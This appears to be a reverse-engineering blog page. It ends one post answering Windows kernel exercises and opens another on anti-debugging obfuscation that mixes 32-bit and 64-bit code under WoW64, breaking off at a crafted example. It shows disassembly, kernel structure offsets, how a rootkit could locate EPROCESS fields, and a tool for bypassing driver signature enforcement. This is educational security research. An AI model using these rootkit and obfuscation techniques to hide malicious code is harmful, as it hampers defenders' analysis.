<span style="font-family: Courier New, Courier, monospace;"><b>PsGetCurrentThreadWin32Thread </b>proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, gs:188h KPCR.Prcb.CurrentThread</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rax+270h] CurrentThread.Win32Thread</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetCurrentThreadWin32Thread endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
------</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetThreadId<span class="Apple-tab-span" style="white-space: pre;"> </span></b>proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rcx+3C0h] ETHREAD.UniqueThread</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetThreadId<span class="Apple-tab-span" style="white-space: pre;"> </span>endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
This api returns the TID from the ETHREAD whose pointer is passed as a parameter.</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
------</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetThreadSessionId </b>proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rcx, [rcx+210h] ETHREAD.Tcb.Process (points to a KPROCESS)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>jmp<span class="Apple-tab-span" style="white-space: pre;"> </span>MmGetSessionId</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetThreadSessionId endp</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">MmGetSessionId<span class="Apple-tab-span" style="white-space: pre;"> </span>proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rcx+2D8h] KPROCESS.Session</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>xor<span class="Apple-tab-span" style="white-space: pre;"> </span>r8d, r8d</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>or<span class="Apple-tab-span" style="white-space: pre;"> </span>edx, 0FFFFFFFFh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>cmp<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, r8 KPROCESS.Session == 0 ?</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>jz<span class="Apple-tab-span" style="white-space: pre;"> </span>short loc_140036959</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>cmp<span class="Apple-tab-span" style="white-space: pre;"> </span>rcx, cs:PsInitialSystemProcess is the KPROCESS the InitialSystemProcess?</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>jz<span class="Apple-tab-span" style="white-space: pre;"> </span>short loc_140036959</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>eax, [rax+8] Session points to a MM_SESSION_SPACE structure, Session+8 is MM_SESSION_SPACE.SessionId</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">loc_140036952:<span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>cmp<span class="Apple-tab-span" style="white-space: pre;"> </span>eax, edx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>cmovz<span class="Apple-tab-span" style="white-space: pre;"> </span>eax, r8d if (eax == edx) return 0 else return eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">loc_140036959:<span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>eax, edx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>jmp<span class="Apple-tab-span" style="white-space: pre;"> </span>short loc_140036952</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">MmGetSessionId<span class="Apple-tab-span" style="white-space: pre;"> </span>endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
The api gets the KPROCESS from the ETHREAD whose pointer is passed as a parameter, then jumps to MmSessionId, which returns the session ID of the current thread. However, if the current thread is the initial system process, or if its pointer to the MM_SESSION_SPACE is NULL, then it returns 0.</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
------</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsIsSystemProcess </b>proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>cmp<span class="Apple-tab-span" style="white-space: pre;"> </span>rcx, cs:PsInitialSystemProcess (this is a pointer to an EPROCESS)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>setz<span class="Apple-tab-span" style="white-space: pre;"> </span>al</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsIsSystemProcess endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
The api compares the EPROCESS whose pointer is passed as a parameter with the EPROCESS pointer stored into the variable PsInitialSystemProcess, to verify if they are equal or not.</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
------</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetProcessImageFileName </b>proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>lea<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rcx+2E0h] EPROCESS.ImageFileName</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetProcessImageFileName endp</span></div>
</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
The api returns the address of the name of the file used to create the process, taken from the EPROCESS whose pointer is passed as an input parameter.</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>12) </b></span><br />
<span style="font-family: Verdana, sans-serif; text-align: justify;"><br /></span>
<span style="font-family: Verdana, sans-serif; text-align: justify;">The offsets of the members in the system structures vary across different versions of Windows (and service packs too). In order to locate the members without hardcoding each possible offset, one possible solution would be to locate fields whose value is known, and then use a relative offset to reach nearby ones. For example, in the case of the EPROCESS structure, the ActiveProcessLinks field has the following offsets in different Windows versions (the list is not exhaustive):</span></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> (all 32 bit)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> xp: +0x88</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> vista: +0xA0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> 2003: +0x98</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> 7: +0xb8</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">However, for all these versions, the UniqueProcessId field is always the one that precedes ActiveProcessLinks, and this property can be leveraged to programmatically locate the ActiveProcessLinks without knowing its offset. In fact, knowing the value of a PID related to an EPROCESS, it is possible to search the entire memory buffer of the EPROCESS structure, looking for the DWORD that contains the known PID value. Once the PID is found, ActiveProcessLinks is located at the following DWORD.</span></div>
</div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Another solution could make use of the kernel APIs: in question 11 I have described various APIs that simply retrieve data from system structures. A rootkit could inspect the code of such APIs by disassembling their instructions, and locating the offsets that they use to extract fields from structures. For example, if we consider the opcodes of the following API:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<div style="text-align: start;">
<span style="font-family: Courier New, Courier, monospace;">PsGetCurrentThreadProcessId proc near</span></div>
<div style="text-align: start;">
<span style="font-family: Courier New, Courier, monospace;">65 48 8B 04 25 88 01 00 00 mov rax, gs:188h KPCR.Prcb.CurrentThread</span></div>
<div style="text-align: start;">
<span style="font-family: Courier New, Courier, monospace;">48 8B 80 B8 03 00 00 mov rax, [rax+3B8h] CurrentThread.Cid.UniqueProcess</span></div>
<div style="text-align: start;">
<span style="font-family: Courier New, Courier, monospace;">C3 retn</span></div>
<div style="text-align: start;">
<span style="font-family: Courier New, Courier, monospace;">PsGetCurrentThreadProcessId endp</span></div>
</div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">a rootkit could parse them and retrieve the offset of the Cid.UniqueProcess field from the second instruction.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>13) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">If you use MmGetPhysicalAddress to resolve a virtual address to a physical address, you have no guarantee that the physical address will still be valid afterwards. For example, if the physical address corresponds to a virtual address in the paged pool, then the data at the physical memory page may be swapped to disk in any moment. This means that the physical page will be filled with other data used by e.g. some other process, thus the driver that called MmGetPhysicalAddress would end up reading the wrong data from physical memory.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">In order to avoid these problems, a driver should first build a MDL describing the Virtual memory address that it wants to query, then it should use the MmProbeAndLockPages API that makes the page resident in case it was swapped out, probes it for valid r/w access and locks it in memory so that it won't be paged out (the API should be called from within a try/except statement). At this point, the driver can call MmGetPhysicalAddress and it can be sure that the data in the physical memory corresponds indeed to the the virtual address, and that it will not be accidentally swapped out.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>14)</b></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This exercise consists in setting up test-signign on a 32 bit and a 64 bit machine. I did not dedicate time to this, since it is a quite tedious task which seems more oriented to installing and configuring rather than reverse engineering :( Besides, the whole procedure is described here:</span><br />
<a href="http://msdn.microsoft.com/en-us/library/windows/hardware/ff546236(v=vs.85).aspx" style="background-color: white; color: #1155cc; font-family: arial, sans-serif; text-align: start;" target="_blank"><span style="font-family: Verdana, sans-serif;">http://msdn.microsoft.com/en-<wbr></wbr>us/library/windows/hardware/<wbr></wbr>ff546236(v=vs.85).aspx</span></a><br />
<span style="font-family: Verdana, sans-serif;">Thus, I am going to skip it for now. In my tests I simply used Windows' test mode, and I signed my drivers with a dummy signature using the tool "Driver Signature Enforcement Overrider" (available from <a href="http://www.ngohq.com/?page=dseo">http://www.ngohq.com/?page=dseo</a>).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>15)</b></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>RtlImageNtHeader:</b> takes in input the virtual address of an executable module, and returns a pointer to the corresponding PE structure. First, the API validates the input parameters by checking that it's not 0 or -1, and that it points to the signature "MZ" (that is, the signature of a IMAGE_DOS_HEADER structure). After that, the API gets the "elfanew" member of the IMAGE_DOS_HEADER structure (that is the offset to the PE header starting from the imagebase) and composes the virtual address of the possible PE file by adding the "e_lfanew" to the imagebase. The code then evaluates two cases. In the first case, if the address of the PE structure is a kernelmode one (that is, if it is bigger than MmHighestUserAddress), then it simply verifies that it points to the signature "PE\0\0" (the signature of a IMAGE_NT_HEADERS structure) and returns it (or it returns 0 otherwise). In the second case, if the address of the PE structure is in usermode, then it verifies that the whole PE header is contained within the usermode (that is, imagebase + sizeof(IMAGE_DOS_HEADER) + sizeof(IMAGE_NT_HEADERS) < MmHighestUserAddress) and returns its address (or it returns 0 otherwise).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><b>RtlImageDirectoryEntryToData: </b></span><span style="font-family: Verdana, sans-serif;">begins by checking the least significant bit in the ImageBase parameter: if it is set, then the variable "MappedAsImage" is set to 0, and the bit itself is cleared (normally, an ImageBase is supposed to be aligned on a page boundary, that is, to have the least significant 12 bits set to zero). The API then obtains the virtual address of the PE header given its ImageBase by calling the function RtlImageNtHeader, it checks the OptionalHeader.Magic field to determine if the image is a 32 bit or 64 bit one, and calls either _RtlpImageDirectoryEntryToData32 or _RtlpImageDirectoryEntryToData64, returning its return value </span><span style="font-family: Verdana, sans-serif;">(the function </span><span style="font-family: Verdana, sans-serif;">_RtlpImageDirectoryEntryToData64 operates in the same way as the 32 bit counterpart, thus it won't be discussed)</span><span style="font-family: Verdana, sans-serif;">.</span><br />
<span style="font-family: Verdana, sans-serif;">The _RtlpImageDirectoryEntryToData32 function verifies that the input DataDirectory parameter is less than OptionalHeader.NumberOfRvaAndSizes, or else it returns zero</span><span style="font-family: Verdana, sans-serif;">. It then accesses OptionalHeader.DataDirectory[DataDirectory].RVA, verifies that it is non-zero, and then it verifies, in case the input PE file is a usermode one, that the address of the obtained DataDirectory entry is still inside usermode. If the MappedAsImage parameter is nonzero, then the virtual address (obtained adding the RVA and the ImageBase) of the data directory is returned, along with its size stored in the "Size" parameter. However, if MappesAsImage is zero, there is some more processing that needs to be done. If the RVA of the data directory is within the size of the headers (OptionalHeader.SizeOfHeaders), then it is converted to VA (again by adding to it the ImageBase) and it is returned. If it is bigger, the function needs to call _RtlAddressInSectionTable to convert the RVA to VA. This step is required because if the PE file being examined is not mapped as an image, then its sections are not being mapped according to the OptionalHeader.SectionAlignment, but they will be aligned to OptionalHeader.FileAlignment (that is, they are not aligned to virtual memory page boundaries, but they are aligned to the file offset alignment which is in general smaller than the virtual one). What the _RtlAddressInSectionTable function does, in fact, is to retrieve the SectionHeader that contains a particular virtual address (through the function _RtlSectionTableFromVirtualAddress), and then use the following formula:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"> </span><span style="font-family: Courier New, Courier, monospace;">SectionHeader.PointerToRawData - SectionHeader.VirtualAddress + ImageBase + RVA</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">to convert the RVA to a file offset.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I was not able to find the <b>AuxKlibGetImageExportDirectory</b> API. I searched in my machines, but it does not seem to be part of the standard drivers installation on XP or Windows 7. I tried to locate the driver that exports it to see if I could download it, but I have not found it yet. As soon as I find such driver I will analyze this API.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>16) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">To track the life and death of processes I would set a callback with PsSetCreateProcessNotifyRoutine in order to be notified whenever a process is created or terminated. To track each process I would use the ProcessIDs, which uniquely identify them. If I need more information (e.g. the image name of the process) I would retrieve them from the EPROCESS structure.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>17) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The page directory is stored in the DirectoryTableBase field of the EPROCESS structure:</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">+0x028 DirectoryTableBase : 0x3db1f000</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">(EPROCESS.Pcb.DirectoryTableBase)</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com1tag:blogger.com,1999:blog-8573685359056491736.post-52953095576388660492014-10-28T17:15:00.000-07:002014-10-28T17:29:24.869-07:00Code obFU(N)scation mixing 32 and 64 bit mode instructions<b><span style="font-family: Verdana, sans-serif; font-size: large;">1 - Introduction</span></b><br />
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This article is about a funny way to obfuscate code that takes advantage of the Windows 64bit capability to manage and run 32bit processes. As we will see, it's a very effective technique that can really be time consuming and annoying.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Windows 64bit natively runs 64bit processes and kernel drivers, but, of course, because of retro-compatibility, it offers the possibility to run old 32bit executables through the WoW64 subsystem. On Intel x86-64 architecture this is implemented via hardware features offered by the CPU that allow 32bit mode code to switch to 64bit mode and viceversa.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The trick relies in these 32bit/64bit switches: you can craft an executable that contains <u><i>both</i></u> 32bit and 64bit code, and you can make the code jump from one to the other at any time. Unfortunately, almost all debuggers seem to be ineffective in dealing with these jumps (only remote kernel debugging using Windbg can step through the code). </span><br />
<span style="font-family: Verdana, sans-serif;">Also the disassemblers don't handle the situation very well, as they are designed to handle only one architecture at a time.</span><br />
<span style="font-family: Verdana, sans-serif;">Long story short: a real mess and a nightmare for analysis!</span></div>
</div>
</div>
<div>
<br /></div>
<div>
<b><span style="font-family: Verdana, sans-serif; font-size: large;">2 - 32bit/64bit switch</span></b></div>
<div>
<b><span style="font-family: Verdana, sans-serif;"><br /></span></b></div>
<div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Let's start analysing how the switch between 32bit and 64bit works, then we can see how it can be abused and what are the problems that it causes to static analysis tools.</span></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Verdana, sans-serif;">2.1 - The basics: how it works</span></b></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The best way to understand how Windows 64bit handles 32bit processes is to see it in action: let's start a remote kernel debugging session and let's see what happens when we debug a 32bit process. In particular, we are going to debug the 32bit API CreateFile to see how the code interfaces with the 64bit operating system. Starting from the API entry point, we will arrive to the following code:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`7698b62b 89450c mov dword ptr [ebp+0Ch],eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`7698b62e 8d45f8 lea eax,[ebp-8]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`7698b631 50 push eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`7698b632 ffd6 call esi {ntdll_772b0000!ZwCreateFile}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`7698b634 8bd8 mov ebx,eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`7698b636 bf220000c0 mov edi,0C0000022h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`7698b63b 3bdf cmp ebx,edi</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This is where the library KERNELBASE.dll is calling the ntdll.dll API </span><span style="font-family: Courier New, Courier, monospace;">ZwCreateFile</span><span style="font-family: Verdana, sans-serif;">. In the good old 32bit windows, ntdll, among other things, acts as a wrapper providing the transition from usermode to kernelmode (that is, it implements a syscall). Now things are different: we step into the call and we get:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">ntdll_772b0000!ZwCreateFile:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`772d00a4 b852000000 mov eax,52h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`772d00a9 33c9 xor ecx,ecx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`772d00ab 8d542404 lea edx,[esp+4]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`772d00af 64ff15c0000000 call dword ptr fs:[0C0h]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`772d00b6 83c404 add esp,4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`772d00b9 c22c00 ret 2Ch</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">There is no </span><span style="font-family: Courier New, Courier, monospace;">sysenter/syscall/int 2E</span><span style="font-family: Verdana, sans-serif;"> here, so this code is not calling the kernel yet. Instead, it is calling the following:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">wow64cpu!X86SwitchTo64BitMode:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`74c62320 ea1e27c6743300 jmp 0033:74C6271E</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">A far jump? You don't really see this type of jump very often in 32bit, so why is it used here? Because it is switching to 64bit mode (the normal usermode code segment for 32bit is </span><span style="font-family: Courier New, Courier, monospace;">0x0023</span><span style="font-family: Verdana, sans-serif;">, and this jump is going to segment </span><span style="font-family: Courier New, Courier, monospace;">0x0033</span><span style="font-family: Verdana, sans-serif;">)! In fact, segment </span><span style="font-family: Courier New, Courier, monospace;">0x0033</span><span style="font-family: Verdana, sans-serif;"> has some specific properties, let's have a look:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">kd> dg 33</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> P Si Gr Pr Lo</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">Sel Base Limit Type l ze an es ng Flags</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">---- ----------------- ----------------- ---------- - -- -- -- -- --------</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033 00000000`00000000 00000000`00000000 <b>Code</b> <b>RE</b> Ac <b>3</b> Nb By P <b>Lo</b> 000002fb</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">It is a code segment with Read/Execute attributes, usermode privilege (ring 3), and the Long bit is set (that is, the segment is for 64bit mode). So now we know how to switch from 32bit to 64bit, but what about the opposite? Since we are executing a 32bit process, it must be possible to switch back to 32bit from 64bit. If we keep debugging, we will pass through the following APIs:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">wow64cpu!CpupReturnFromSimulatedCode</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">wow64cpu!TurboDispatchJumpAddressStart</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">wow64!Wow64SystemServiceEx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">wow64!whNtCreateFile</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Verdana, sans-serif;">and finally land on:</span></div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">ntdll!NtCreateFile</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`77121860 4c8bd1 mov r10,rcx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`77121863 b852000000 mov eax,52h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`77121868 0f05 syscall</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`7712186a c3 ret</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The system call itself happens in 64bit mode: in fact, it is not allowed to use a <i>syscall</i> instruction from 32bit mode, or else an exception will be raised. This is an interesting detail, because it tells us that all the APIs that require a transition to kernelmode must switch to 64bit. (Hint: if you can control the switch to 64bit you can implement a cheap API logger ;))</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">We finish debugging this API and we get to what we were looking for:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`74c626b0 4489442410 mov dword ptr [rsp+10h],r8d</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`74c626b5 458b85c8000000 mov r8d,dword ptr [r13+0C8h]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`74c626bc 4c89442418 mov qword ptr [rsp+18h],r8</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`74c626c1 458b85bc000000 mov r8d,dword ptr [r13+0BCh]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`74c626c8 4c890424 mov qword ptr [rsp],r8 </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">0033:00000000`74c626cc 48cf iretq</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The <i>iretq</i> instruction is similar to a <i>ret</i>: it returns to the address that is on the top of the stack, but it will also get from there the values that will be used to restore the registers CS, EFL, RSP, SS. We have come full circle:</span></div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnDeSNYdt5kw9mBjI_FfCq5kIE9Fg1dHKl9PLx4tgGMjBrDuPYPVGS1ii-oJakhytNWQufTywpIZUB1-HMaPq2Uf5oYY1_4o6Y0V5Tm2q_F1q6Joke9cYLVlri_MqYYCpBZM9Y1XXr_bU/s1600/jmpred.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnDeSNYdt5kw9mBjI_FfCq5kIE9Fg1dHKl9PLx4tgGMjBrDuPYPVGS1ii-oJakhytNWQufTywpIZUB1-HMaPq2Uf5oYY1_4o6Y0V5Tm2q_F1q6Joke9cYLVlri_MqYYCpBZM9Y1XXr_bU/s1600/jmpred.png" /></a></div>
<div>
<br /></div>
<div>
<span style="font-family: Verdana, sans-serif;">And this is all we need to know about the mode switches.</span></div>
</div>
<div>
<br /></div>
<div>
<div>
<b><span style="font-family: Verdana, sans-serif;">2.2 - Abusing 32bit/64bit switches</span></b></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">If Windows library code can simply jump back and forth from 32bit and 64bit mode, then why can't we? In fact, we can just fine! As an example I have crafted a 32bit executable that performs a jump to 64bit mode, and then it jumps back to 32bit. Here it is:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401000 _main proc near </span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">.text:00401000 call ds:DebugBreak</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
